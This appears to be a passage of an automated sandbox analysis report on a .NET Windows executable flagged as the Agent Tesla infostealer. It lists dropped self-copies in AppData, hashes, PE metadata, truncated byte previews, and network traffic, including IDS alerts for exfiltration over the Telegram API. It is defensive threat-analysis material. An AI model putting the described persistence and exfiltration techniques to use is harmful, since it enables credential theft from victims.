                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dsdp1x51.web.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_p4snmec2.2zw.ps1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rydz4q53.akc.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_txscot0j.aim.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xu1bhbsk.zgm.psm1

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:very short file (no magic)
                                                                                Category:dropped
                                                                                Size (bytes):1
                                                                                Entropy (8bit):0.0
                                                                                Encrypted:false
                                                                                SSDEEP:3:U:U
                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                Malicious:false
                                                                                Preview:1

                                                                                C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1863168
                                                                                Entropy (8bit):5.309741607982687
                                                                                Encrypted:false
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                MD5:AE2A3B41292C66A9DD6F10C874C05293
                                                                                SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                                                                SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                                                                SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: Virustotal, Detection: 53%, Browse
                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..

                                                                                C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe:Zone.Identifier

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Category:dropped
                                                                                Size (bytes):1863168
                                                                                Entropy (8bit):5.309741607982687
                                                                                Encrypted:false
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                MD5:AE2A3B41292C66A9DD6F10C874C05293
                                                                                SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                                                                SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                                                                SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                                                                Malicious:true
                                                                                Antivirus:
                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..

                                                                                C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier

                                                                                Download File
                                                                                Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                Category:modified
                                                                                Size (bytes):26
                                                                                Entropy (8bit):3.95006375643621
                                                                                Encrypted:false
                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                Malicious:true
                                                                                Preview:[ZoneTransfer]....ZoneId=0

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):5.309741607982687
                                                                                TrID:
                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                • Windows Screen Saver (13104/52) 0.07%
                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                File name:izwFjkhFJm.exe
                                                                                File size:1863168
                                                                                MD5:ae2a3b41292c66a9dd6f10c874c05293
                                                                                SHA1:caa30701c5487c2aecfb9b35b1d0e9ea6f3214b6
                                                                                SHA256:65cc1ea27c733c270dd0497ed9c99896baf50eeafa5e1200889557985bfd87d5
                                                                                SHA512:54606fce1ce37ca0b4a25dd94abc5cd47be86a498204a0581def8a62f714ea101b817570a456ff7e054a4c8d3de8f3d69a8cd823dfa87515c4690ae229bb6315
                                                                                SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                                                                TLSH:0D854CF24193FEC4976F2D4481143A40DC101C6797BC9698FDC92AA793E9978EF9CAB0
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`................................

                                                                                File Icon

                                                                                Icon Hash:78b87c6c6c606880

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x5c66f2
                                                                                Entrypoint Section:.text
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x6417E07C [Mon Mar 20 04:26:36 2023 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                jmp dword ptr [00402000h]
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1c66980x57.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1c80000x21e8.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1cc0000xc.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x1c46f80x1c4800False0.4735319190262431data5.272126053067271IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x1c80000x21e80x2200False0.8832720588235294data7.595705097596992IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x1cc0000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountry
                                                                                RT_ICON0x1c81300x1c12PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                RT_GROUP_ICON0x1c9d440x14data
                                                                                RT_VERSION0x1c9d580x2dcdata
                                                                                RT_MANIFEST0x1ca0340x1b4XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

                                                                                Imports

                                                                                DLLImport
                                                                                mscoree.dll_CorExeMain

                                                                                Network Behavior

                                                                                Snort IDS Alerts

                                                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                192.168.2.3149.154.167.220497154432851779 03/20/23-18:33:24.869717TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49715443192.168.2.3149.154.167.220
                                                                                192.168.2.3149.154.167.220497014432851779 03/20/23-18:31:36.462231TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49701443192.168.2.3149.154.167.220

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 20, 2023 18:31:27.699748039 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:27.699857950 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:27.699994087 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:27.733558893 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:27.733618975 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.379163980 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.379291058 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:28.382338047 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:28.382364035 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.382752895 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.586198092 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:28.648602009 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:28.648667097 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.803409100 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.803500891 CET44349699173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:31:28.803656101 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:28.804965973 CET49699443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:31:36.293730974 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.293807983 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.293895960 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.294677019 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.294722080 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.361607075 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.361701012 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.367089987 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.367127895 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.367513895 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.428234100 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.428277969 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.455465078 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.462035894 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.462074995 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.567434072 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.567543983 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.568159103 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.568188906 CET44349701149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:31:36.568207979 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:31:36.568258047 CET49701443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:32:35.641273975 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:35.641380072 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:35.641500950 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:35.658441067 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:35.658540964 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:36.303930998 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:36.304028988 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:36.306864977 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:36.306899071 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:36.307337046 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:36.514731884 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:36.514903069 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:36.752813101 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:36.752886057 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:37.603478909 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:37.603661060 CET44349702173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:32:37.603812933 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:32:37.608839989 CET49702443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.255290031 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.255369902 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:23.255475044 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.258941889 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.259001017 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:23.901695013 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:23.901845932 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.904732943 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.904772043 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:23.905273914 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:23.941174984 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:23.941207886 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:24.256023884 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:24.256136894 CET44349714173.231.16.76192.168.2.3
                                                                                Mar 20, 2023 18:33:24.256246090 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:24.257375956 CET49714443192.168.2.3173.231.16.76
                                                                                Mar 20, 2023 18:33:24.753156900 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.753216028 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.753302097 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.753787041 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.753807068 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.817501068 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.817751884 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.820658922 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.820687056 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.821106911 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.823626995 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.823657036 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.869210958 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.869610071 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.869642973 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.982460022 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.982655048 CET44349715149.154.167.220192.168.2.3
                                                                                Mar 20, 2023 18:33:24.982764006 CET49715443192.168.2.3149.154.167.220
                                                                                Mar 20, 2023 18:33:24.983042955 CET49715443192.168.2.3149.154.167.220

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Mar 20, 2023 18:31:27.614362001 CET5892153192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:31:27.633577108 CET53589218.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:31:27.642391920 CET6270453192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:31:27.665841103 CET53627048.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:31:36.269547939 CET5784053192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:31:36.289082050 CET53578408.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:32:35.568073988 CET5799053192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:32:35.586179972 CET53579908.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:32:35.607027054 CET5238753192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:32:35.627496004 CET53523878.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:33:23.202795029 CET4930253192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:33:23.222448111 CET53493028.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:33:23.229949951 CET5397553192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:33:23.249663115 CET53539758.8.8.8192.168.2.3
                                                                                Mar 20, 2023 18:33:24.733335972 CET5113953192.168.2.38.8.8.8
                                                                                Mar 20, 2023 18:33:24.752517939 CET53511398.8.8.8192.168.2.3

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Mar 20, 2023 18:31:27.614362001 CET192.168.2.38.8.8.80x19fcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:27.642391920 CET192.168.2.38.8.8.80xa091Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:31:36.269547939 CET192.168.2.38.8.8.80x71bcStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.568073988 CET192.168.2.38.8.8.80x38bcStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                Mar 20, 2023 18:32:35.607027054 CET192.168.2.38.8.8.80xc297Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
